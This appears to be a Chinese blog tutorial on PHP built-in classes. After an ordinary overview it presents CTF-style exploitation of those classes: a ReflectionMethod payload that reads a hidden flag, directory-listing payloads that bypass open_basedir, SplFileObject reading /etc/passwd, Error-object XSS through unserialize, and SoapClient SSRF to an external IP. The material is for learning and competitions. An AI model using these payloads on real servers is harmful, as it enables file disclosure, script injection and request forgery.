PHP原生类详解

最新推荐文章于 2023-11-13 00:12:36 发布
最新推荐文章于 2023-11-13 00:12:36 发布
阅读量819 收藏 6
点赞数 2
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_71467825/article/details/131332439
版权

什么是php原生类

PHP 原生类指的是 PHP 内置的类,它们可以直接在 PHP 代码中使用且无需安装或导入任何库。

以下是一些常用的 PHP 原生类:

1. DateTime 类:用于处理日期和时间,支持各种格式和时间区域。

2. PDO 类:用于访问和操作关系型数据库,如 MySQL、PostgreSQL 等。

3. FilesystemIterator 类:用于迭代文件系统目录,支持过滤器和递归。

4. DOMDocument 类:用于创建和操作 XML 文档,支持 XPath 查询和转换。

5. Reflection 类:用于分析和操作 PHP 代码的元数据,如类、方法、属性等。

6. Spl 类:用于实现各种数据结构和算法,如堆、队列、栈、哈希表等。

7. SimpleXMLElement 类:用于创建和操作 XML 元素,支持链式调用和属性设置。

8. ZipArchive 类:用于创建和解压 ZIP 压缩文件,支持密码保护和分卷压缩。

以上是一些常用的 PHP 原生类,它们覆盖了 PHP 应用开发中大部分的需求。开发人员可以根据自己的实际需求选择不同的类来完成各种任务。

PHP原生类是指PHP语言中自带的类,包括但不限于:字符串操作类、数组操作类、日期时间操作类等等。利用PHP原生类可以大大提高开发效率和代码质量。

以下是几个利用PHP原生类的实际应用:

1. 使用数组操作类实现数据排序:PHP原生数组操作类提供了sort()、rsort()、asort()、arsort()等函数,可方便地对数字和字符串类型的数组进行升序或降序排序。

2. 使用日期时间操作类生成时间戳:PHP原生日期时间操作类提供了多个时间戳函数,如time()、strtotime()、microtime()等,通过这些函数可以轻松获取当前时间或将日期时间转换为时间戳。

3. 使用字符串操作类进行文本处理:PHP原生字符串操作类提供了大量的字符串处理函数,如strlen()、substr()、strpos()、str_replace()等,能够实现字符串长度计算、字符截取、查找替换等常见的文本处理操作。

总的来说,PHP原生类提供了丰富的功能和方法,通过充分利用这些类,可以让PHP开发更加快速和高效。

以下是一个 PHP 原生类的示例代码:

class Person {
 
  private $name;
  private $age;
 
  function __construct($name, $age) {
    $this->name = $name;
    $this->age = $age;
  }
 
  public function getName() {
    return $this->name;
  }
 
  public function getAge() {
    return $this->age;
  }
 
  public function setName($name) {
    $this->name = $name;
  }
 
  public function setAge($age) {
    $this->age = $age;
  }
 
}


 

// 使用 Person 类创建一个新对象

$person = new Person("John Doe", 30);

// 打印对象的名字和年龄
echo "Name: " . $person->getName() . "<br>";
echo "Age: " . $person->getAge() . "<br>";

// 修改对象的名字和年龄
$person->setName("Jane Doe");
$person->setAge(25);

// 再次打印对象的名字和年龄
echo "Name: " . $person->getName() . "<br>";
echo "Age: " . $person->getAge() . "<br>";

这个示例代码定义了一个名为 `Person` 的类,它有两个私有属性 `$name` 和 `$age`,以及一个构造函数和四个公共方法,分别用于获取和设置对象的名字和年龄。代码使用 `new` 关键字创建了一个新的 `Person` 对象,并使用 `echo` 输出了对象的名字和年龄。然后,代码修改了对象的名字和年龄,并再次使用 `echo` 输出了修改后的值。

下面的题取自21年国赛题目

ReflectionMethod

(PHP 5 >=5.1.0,PHP7,PHP8)

源码:
<?php
highlight_file(__file__);
class User
{
    private static $c = 0;
    function a()
    {
        return   self::$c;
    }
    function b()
    {
        return   self::$c;
    }
    function c()
    {
    /**
         * flag{XINO}
         */
        return   self::$c;
    }
    function d()
    {
        return   self::$c;
    }
    function e()
    {
        return   self::$c;
    }
    function f()
    {
        return   self::$c;
    }
    function g()
    {
        return   self::$c;
    }
    function h()
    {
        return   self::$c;
    }
    function i()
    {
        return   self::$c;
    }
    function j()
    {
        return   self::$c;
    }
    function k()
    {
        return   self::$c;
    }
    function l()
    {
        return   self::$c;
    }
    function m()
    {
        return   self::$c;
    }
    function n()
    {
        return   self::$c;
    }
    function o()
    {
        return   self::$c;
    }
    function p()
    {
        return   self::$c;
    }
    function q()
    {
        return   self::$c;
    }
    function r()
    {
        return   self::$c;
    }
    function s()
    {
        return   self::$c;
    }
    function t()
    {
        return   self::$c;
    }
}
$rc=$_GET["rc"];
$rb=$_GET["rb"];
$ra=$_GET["ra"];
$rd=$_GET["rd"];
$method= new $rc($ra, $rb);
var_dump($method->$rd());

源码环境没有搞到,自己写了一个

rc是传入原生类名,rb和ra是传入类的属性,rd时传入类方法,后面就是实例化调用方法

payload:

?rc=ReflectionMethod&ra=User&rb=c&rd=getDocComment

读取目录/文件

DirectoryIterator

功能:便利指定目录里的文件,可以配合glob://协议使用匹配来寻找文件路径:

<?php
$dir = new DirectoryIterator("glob:///*flag*");
echo $dir;

或者遍历全部文件

<?php
$dir = new DirectoryIterator("/");
foreach($dir as $f){
    echo($f.'<br>');
//echo($f->__toString().'<bar>');
}

FilesystemIterator

使用方式与DirectoryIterator基本相同,这里就不细讲了

GlobIterator

Globlterator类也可以遍历一个文件目录,但与上面略不同的是其行为类似于glob(),可以通过模式匹配来寻找文件路径

它的特点就是,只需要知道部分名称就可以进行遍历

例如

<?php
$dir = new GlobIterator("/*flag*");
echo $dir;

绕过open_basedir

open_basedir将php所能打开的文件限制在指定的目录树中,包括文件本身,当程序要使用例如fopen()或file_get_contents()打开一个文件时,这个文件的位置将会被检查,当文件在指定的目录树之外,程序将拒绝打开

Directorylterator

DirectoryIterator与glob://协议在一起组合可以绕过open_basedir

测试

<?php
$dir = $_GET['XINO'];
$a = new DirectoryIterator($dir);
foreach($a as $f){
    echo($f.'<br>');
?>
# payload一句话的形式:
$a = new DirectoryIterator("glob:///*");foreach($a as $f){echo($f.'<br>');}

利用payload

/?XINO=glob:///*  #列出根目录下所有文件

FilesystemIterator

与上面基本一致,不在过多讨论

GlobIterator

根据该类特点,不用在配合glob://协议

一句话payload

$a = new FilesystemIterator("/*");foreach($a as $f){echo($f.'<br>');}

SplFileObject类

平常读取只能读取一行,要全部读取需要对内容进行遍历

<?php
$context = new SplFileObject('/etc/passwd');
foreach($context as $f){
    echo($f);
}

Error/Exception 内置类进行xss

Error:用于PHP7,8,开启报错

Error是所有PHP内部错误类的基类,该类是在PHP 7.0.0 中开始引入的

PHP7中,可以在echo时触发__toString,来构造XSS。

测试

<?php
$a = unserialize($_GET['XINO']);
echo $a;
?>

反序列化却没有pop链,只能找到php内置类来进行反序列化

poc:

<?php
$a = new Error("<script>alert('xss')</script>");
$b = serialize($a);
echo urlencode($b);
?>

传入输出会出现弹框,一个简单的利用

Exception 内置类

与上面类似,有兴趣的可以去复现一下

SoapClient类进行SSRF(这个知识点我在另外一篇文章里面讲到过,在这里宣传一下)

专门用来访问web服务的类,可以提供一个基于SOAP协议访问Web服务的PHP客户端

该内置类有一个__call方法,当__call方法被触发后,它可以发送HTTP和HTTPS请求,正是这个__call方法,使得SoapClient类可以被我们运用在SSRF中

构造函数

public SoapClient ::SoapClient(mixed $wsal [, array $options])

第一个参数是用来指明是否是wsdl模式,将该数值设为null则表示非wsdl模式

第二个参数为一个数组,如果在wsdl模式下,此参数可选;如果在非wsdl模式下,则必须设置location和uri选项,其中location是要讲请求发送到SOAP服务器的URL,而uri是SOAP服务的目标命名空间

<?php
$a = new SoapClient(null,array('location'=>'http://50.xxx.xxx.6:2333/XINO', 'uri'=>'http://50.xxx.xxx.60:2333'));
$b = serialize($a);
echo $b;
$c = unserialize($b);
$c->a();  //触发__call方法进行ssrf
?>

屿暖暖
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP反序列化总结4--原生总结
m0_66458291的博客
01-14 699
PHP 原生指的是 PHP 内置的,它们可以直接在 PHP 代码中使用且无需安装或导入任何库,相当于代码中的内置方法例如echo ,print等等可以直接调用,但是原生就是可以就直接php中直接创建的,我们可以直接调用创建对象,但是这些中有的会有魔术方法,为此,我们可以创建原生去利用其中的魔术方法来达到我们反序列化的利用。
PHP原生
qq_63928796的博客
11-09 1172
原生就是php内置,不用定义php自带的,即不需要在当前脚本写出,但也可以实例化的我们可以通过脚本找一下php原生
浅谈php原生的利用 2(Error&SoapClient&SimpleXMLElement)
weixin_63231007的博客
01-19 2250
CTF中原生Error&SoapClient的一些利用
php原生的总结
unexpectedthing的博客
12-12 5416
文章目录前言利用Error/Exception 内置进行 XSSError内置Exception内置[BJDCTF 2nd]xss之光使用 Error/Exception 内置绕过哈希比较ErrorException [2020 极客大挑战]GreatphpSoapClient来进行SSRF 前言 之所以这个总结,极客大挑战的SoEzunser考到了php原生来遍历目录 其实,在CTF题目中,可以利用php原生来进行XSS,反序列化,SSRF,XXE和读文件的思路 通过遍历看一下php的内
PHP原生总结利用
最新发布
qq_44640313的博客
11-13 2301
PHP原生总结及例题
php去除html标记的原生函数详解
10-24
主要介绍了php去除html标记的原生函数详解,非常详细,需要的朋友可以参考下
原生php实现mvc模式
09-25
**原生PHP实现MVC模式详解** MVC(Model-View-Controller)设计模式是一种广泛应用于Web开发中的架构模式,它的主要目标是将业务逻辑、数据处理和用户界面分离,从而提高代码的可维护性和可扩展性。在PHP中,我们...
PHP读取大文件的SplFileObject使用介绍
10-26
一般读取文件我们用fopen 或者 file_get_contents ,前者可以循环读取,后者可以一次性读取,但都是将文件内容一次性加载来操作。
详解PHP原生DOM对象操作XML的方法
10-21
大家都知道对于操作XML型文件,PHP内置有一套DOM对象可以进行处理。对XML的操作,从创建、添加到修改、删除都可以使用DOM对象中的函数来进行。下面这篇文章通过示例代码给大家介绍如何进行操作,有需要的朋友们...
PHP:【微信小程序】微信小程序API,微信小程序路由,微信小程序作用域,微信小程序网络通讯
ZzzWClock的博客
10-14 331
PHP:【微信小程序】微信小程序API,微信小程序路由,微信小程序作用域,微信小程序网络通讯 一.微信 API 1.什么是 API 小程序开发框架提供丰富的微信原生API,可以方便的调起微信提供的能力,如获取用户信息,本地存储,支付功能等 小程序提供的API按照功能主要分为几大:网络、媒体、文件、数据缓存、位置、设备、界面、界面节点信息还有一些特殊的开放接口 2.事件监听 API 以 on 开头的 API 用来监听某个事件是否触发 这 API 接受一个回调函数作为参数,当事件触发时会调用这个回
php原生的简单总结
m0_62274649的博客
11-17 693
PHP原生的简单总结
php内置小结
leekos的博客,分享web安全相关知识~
05-31 1059
PHP 的内置 SoapClient 是一个专门用来访问web服务的,可以提供一个基于SOAP协议访问Web服务的 PHP 客户端。Errorphp的一个内置,通常用于自定义一个Error,在php7版本后适用,可能存在xss漏洞,因为内置了一个。也是可以遍历一个文件目录,使用方法与前两个也基本相似。看了一下文档发现该原生是继承FilesystemIterator的,所以也是以绝对路径显示的。(需要注意的是,我们使用GlobIterator只需要输入路径即可,不需要添加glob://)
关于php原生开发与主流php框架使用心得
api_Anzexi的博客
05-04 941
PHP是世界上最好的web开发语言
原生php api接口_API接口基础.php
weixin_42363854的博客
03-08 381
/*** 总控制器-API接口基础* 2019年9月22日9:16:23* ZJY*/namespace Api;class Base{// 构造函数public function __construct(){$token=$_GET['token'];if(empty($token)){session_start();$this->session_id=session_id();}els...
PHP 原生的利用
cjdgg的博客
04-20 3067
DASCTF做题学习-反序列化&SSTIez_serialize ez_serialize 这题直接给出了源代码,源代码也都挺简单的 <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $this->class
PHP原生开发demo
kinghuahua
06-08 629
好久没有用到原生PHP进行页面的开发了,昨天帮忙写了一个,不过脑子,也没有封装,像流水一样,哈哈哈哈
原生PHP接口
fdsal的博客
04-26 894
APP如何进行通信 APP与浏览器通信的异同 相同处:都是向服务器端发起HTTP请求,经过服务器端的逻辑处理后返回相对应的结果。 不同处: 请求来源 接口地址 返回数据格式 APP 不可见 xml或者json 浏览器 可见 html XML定义 扩展标记语言((Extensible Markup Language ,XML ) ,可以用来标记数据、定义数据型,是一种允许用户对自己的标记语言进行定义的源语言。 XML格式统一,跨平台和语言,非常适合传输和通信,早已成为业界公认的标准
使用原生ajax进行提交实例详解
05-01
Ajax (Asynchronous JavaScript and XML) 是一种在不刷新整个页面的情况下,使用 JavaScript 发起异步请求,获取或提交数据的技术。原生 Ajax 是指不依赖任何 JavaScript 框架或库,纯粹使用原生 JavaScript 实现 Ajax。下面是一个使用原生 Ajax 进行提交的实例详解。 首先需要创建一个 XMLHttpRequest 对象: ``` var xmlhttp; if (window.XMLHttpRequest) { // IE7+、Firefox、Chrome、Opera、Safari 浏览器执行代码 xmlhttp = new XMLHttpRequest(); } else { // IE6、IE5 浏览器执行代码 xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } ``` 然后设置请求方式和请求地址: ``` var url = "submit.php"; // 提交的处理程序 var method = "POST"; // 提交的方式,可以是 GET 或 POST xmlhttp.open(method, url, true); // true 表示异步请求 ``` 接着设置请求头: ``` xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); ``` 这里使用了 application/x-www-form-urlencoded 格式。如果需要提交 JSON 格式的数据,则设置为: ``` xmlhttp.setRequestHeader("Content-type", "application/json"); ``` 接下来设置回调函数: ``` xmlhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { // 请求成功,处理返回的数据 console.log(this.responseText); } }; ``` 当 readyState == 4 时,表示请求已完成;status == 200 表示请求成功。这里只是简单地输出了返回的数据,可以根据具体情况进行处理。 最后发送请求,提交数据: ``` var data = "name=John&age=18"; // 提交的数据,可以是表单数据或 JSON 数据 xmlhttp.send(data); ``` 这里提交了两个字段,name 和 age,可以根据实际情况修改。当使用 GET 方式提交时,数据需要拼接到 URL 中,例如: ``` var url = "submit.php?name=John&age=18"; xmlhttp.open("GET", url, true); xmlhttp.send(); ``` 以上就是使用原生 Ajax 进行提交的实例详解。需要注意的是,原生 Ajax 还需要处理一些兼容性和安全性问题,例如 IE6、7 下不能并发多个 Ajax 请求,跨域请求需要使用 JSONP 或设置 CORS 等。因此,如果条件允许,建议使用现代的 JavaScript 框架或库来简化 Ajax 的操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值